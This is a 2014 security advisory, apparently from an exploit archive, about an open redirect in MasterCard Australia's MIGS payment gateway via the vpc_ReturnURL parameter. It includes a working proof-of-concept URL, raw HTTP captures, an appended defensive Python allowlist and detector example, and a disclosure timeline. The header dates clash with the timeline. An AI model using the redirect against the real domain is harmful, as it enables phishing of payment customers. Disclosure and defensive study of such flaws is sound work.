MasterCard Open Redirect
Posted Jul 28, 2014
Authored by Anastasios Monachos

MasterCard.com.au suffers from an open redirect vulnerability.

tags | exploit
MD5 | 77dc1b214c7c0b74a7b3c4e00d19a427

=======================================================================
MasterCard - Open Redirect
=======================================================================

Affected Domain : mastercard.com.au
Local/Remote : Remote
Severity : Very Low
Vulnerable URL : https://migs.mastercard.com.au/vpcpay?vpc_ReturnURL=http://<any_domain>
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]

[Summary]

The vpc_ReturnURL parameter of the vpcpay script is not validated before being used as a redirect target. This can be exploited to redirect a user to an arbitrary website, e.g. when the user clicks a specially crafted link to the affected script hosted on a trusted domain.

[Vulnerability Details]

GET Request:
------------
GET https://migs.mastercard.com.au/vpcpay?vpc_ReturnURL=http://www.google.com HTTP/1.1
Host: migs.mastercard.com.au
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

GET Response:
-------------
HTTP/1.1 302 Found
Date: Mon, 23 May 2014 12:26:51 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa TA1a OUR BUS IND UNI COM NAV INT"
Set-Cookie: PAY4939831625825013779=PAY8CA6985107791A1B572838CBB73CF5D3; Path=/; Secure
Expires: Sun, 15 Jun 1990 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: PS_ENCODING_COOKIE=iso-8859-1; Expires=Mon, 23-Jun-2014 12:56:51 GMT; Secure
Accept-Charset: iso-8859-1, unicode-1-1;q=0.8
Pragma: no-cache
Location: https://migs.mastercard.com.au/vpcpay?o=pt&DOID=AA93D612C3210464C0F03BF66D5DCDCE&paymentId=4999831621825113478
Content-Language: en
Content-Length: 0
Keep-Alive: timeout=15, max=79
Connection: Keep-Alive
Content-Type: text/html;charset=iso-8859-1

Follow up GET Request I:
------------------------
GET https://migs.mastercard.com.au/vpcpay?o=pt&DOID=AA93D612C3210464C0F03BF66D5DCDCE&paymentId=4999831621825113478 HTTP/1.1
Host: migs.mastercard.com.au
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

GET follow up Response I:
-------------------------
HTTP/1.1 302 Found
Date: Mon, 23 May 2014 12:27:10 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa TA1a OUR BUS IND UNI COM NAV INT"
Expires: Sun, 15 Jun 1990 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: PS_ENCODING_COOKIE=iso-8859-1; Expires=Mon, 23-Jun-2014 12:57:10 GMT; Secure
Accept-Charset: iso-8859-1, unicode-1-1;q=0.8
Pragma: no-cache
Location: http://www.google.com?vpc_Amount=0&vpc_BatchNo=0&vpc_Locale=en&vpc_Message=Required+field+vpc_Merchant+was+not+present+in+the+request&vpc_TransactionNo=0&vpc_TxnResponseCode=7
Content-Language: en
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=iso-8859-1

GET follow up Request II:
-------------------------
GET http://www.google.com/?vpc_Amount=0&vpc_BatchNo=0&vpc_Locale=en&vpc_Message=Required+field+vpc_Merchant+was+not+present+in+the+request&vpc_TransactionNo=0&vpc_TxnResponseCode=7 HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

GET follow up Response II:
--------------------------
HTTP/1.1 302 Found
Location: http://www.google.com/?gws_rd=cr&ei=QR2oU9PfGYf-ygO6yIC4Dg
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 23 May 2014 12:27:41 GMT
Server: gws
Content-Length: 258
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.com/?gws_rd=cr&ei=QR2oU9PfGYf-ygO6yIC4Dg">here</A>.
</BODY></HTML>

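The exchange above shows the gateway taking the caller-supplied vpc_ReturnURL verbatim, appending its vpc_* result fields and issuing a 302 to it, even though the request carried no vpc_Merchant at all. The following Python is an added example, not code from the advisory or from MasterCard's gateway: it places that weak behaviour next to a hardened form that only ever redirects to a return URL pre-registered for the authenticated merchant (the `REGISTERED_RETURN_URLS` allowlist, merchant id `MERCHANT_ONE`, host `shop.example` and the `gateway.example` error page are all constructed assumptions), and adds a small check that flags an off-site Location header in a captured response, which is the defensive test a pentester or a WAF rule would apply to this class of bug.

```python
from urllib.parse import urlsplit, urlencode

# Hypothetical allowlist of return URLs registered out-of-band by each merchant
# (constructed sample data; a real gateway would load this from merchant config).
REGISTERED_RETURN_URLS = {
    "MERCHANT_ONE": {"https://shop.example/checkout/return"},
}


def build_vulnerable_redirect(vpc_return_url, result_params):
    """Mirrors the behaviour seen in the advisory: whatever URL the request
    supplied is used as the redirect target, with the vpc_* fields appended."""
    sep = "&" if "?" in vpc_return_url else "?"
    return vpc_return_url + sep + urlencode(result_params)


def safe_return_url(merchant_id, vpc_return_url):
    """Return the canonical registered URL if the supplied one matches it on
    scheme, host and path; otherwise None. Userinfo ("host@evil"), non-https
    schemes and unknown merchants are all rejected."""
    try:
        parts = urlsplit(vpc_return_url)
    except ValueError:
        return None
    if parts.scheme != "https" or parts.hostname is None:
        return None
    if parts.username is not None or parts.password is not None:
        return None
    # Compare on host and path only; query and fragment never affect the decision.
    candidate = f"https://{parts.hostname.lower()}{parts.path or '/'}"
    allowed = REGISTERED_RETURN_URLS.get(merchant_id, set())
    return candidate if candidate in allowed else None


def build_hardened_redirect(merchant_id, vpc_return_url, result_params, fallback):
    """Redirect only to an allowlisted URL; otherwise land on the gateway's own
    error page so the trusted domain can never be used as a bounce."""
    target = safe_return_url(merchant_id, vpc_return_url)
    if target is None:
        target = fallback
    return target + "?" + urlencode(result_params)


def redirect_target(raw_response):
    """Extract the Location header from a raw HTTP response, or None."""
    for line in raw_response.splitlines():
        name, _, value = line.partition(":")
        if name.strip().lower() == "location":
            return value.strip()
    return None


def is_offsite_redirect(raw_response, gateway_host):
    """True when a response redirects to a host other than the gateway itself."""
    target = redirect_target(raw_response)
    if target is None:
        return False
    host = urlsplit(target).hostname
    return host is not None and host.lower() != gateway_host.lower()


# Constructed sample response, modelled on the advisory's "follow up Response I".
SAMPLE_OFFSITE_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Server: Apache\r\n"
    "Location: http://www.google.com?vpc_Amount=0&vpc_TxnResponseCode=7\r\n"
    "Content-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    result = {"vpc_Amount": "0", "vpc_TxnResponseCode": "7"}
    print(build_vulnerable_redirect("http://www.google.com", result))
    print(build_hardened_redirect("MERCHANT_ONE", "http://www.google.com", result,
                                  "https://gateway.example/error"))
    print(is_offsite_redirect(SAMPLE_OFFSITE_RESPONSE, "migs.mastercard.com.au"))
```

The allowlist comparison deliberately returns the stored canonical URL rather than the submitted string, so a match can only ever send the user to a URL the merchant registered; anything with a query string, userinfo or a look-alike host is dropped to the gateway's own error page, and the absence of a merchant id (the case in the advisory's request) yields an empty allowlist and therefore no off-site redirect.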

[Time-line]

23/06/2014 - Advisory created
23/06/2014 - Mastercard notified: no response
25/06/2014 - Vendor contacted again - different department: no response
08/07/2014 - Re-contacted both departments: no response
27/07/2014 - Advisory published
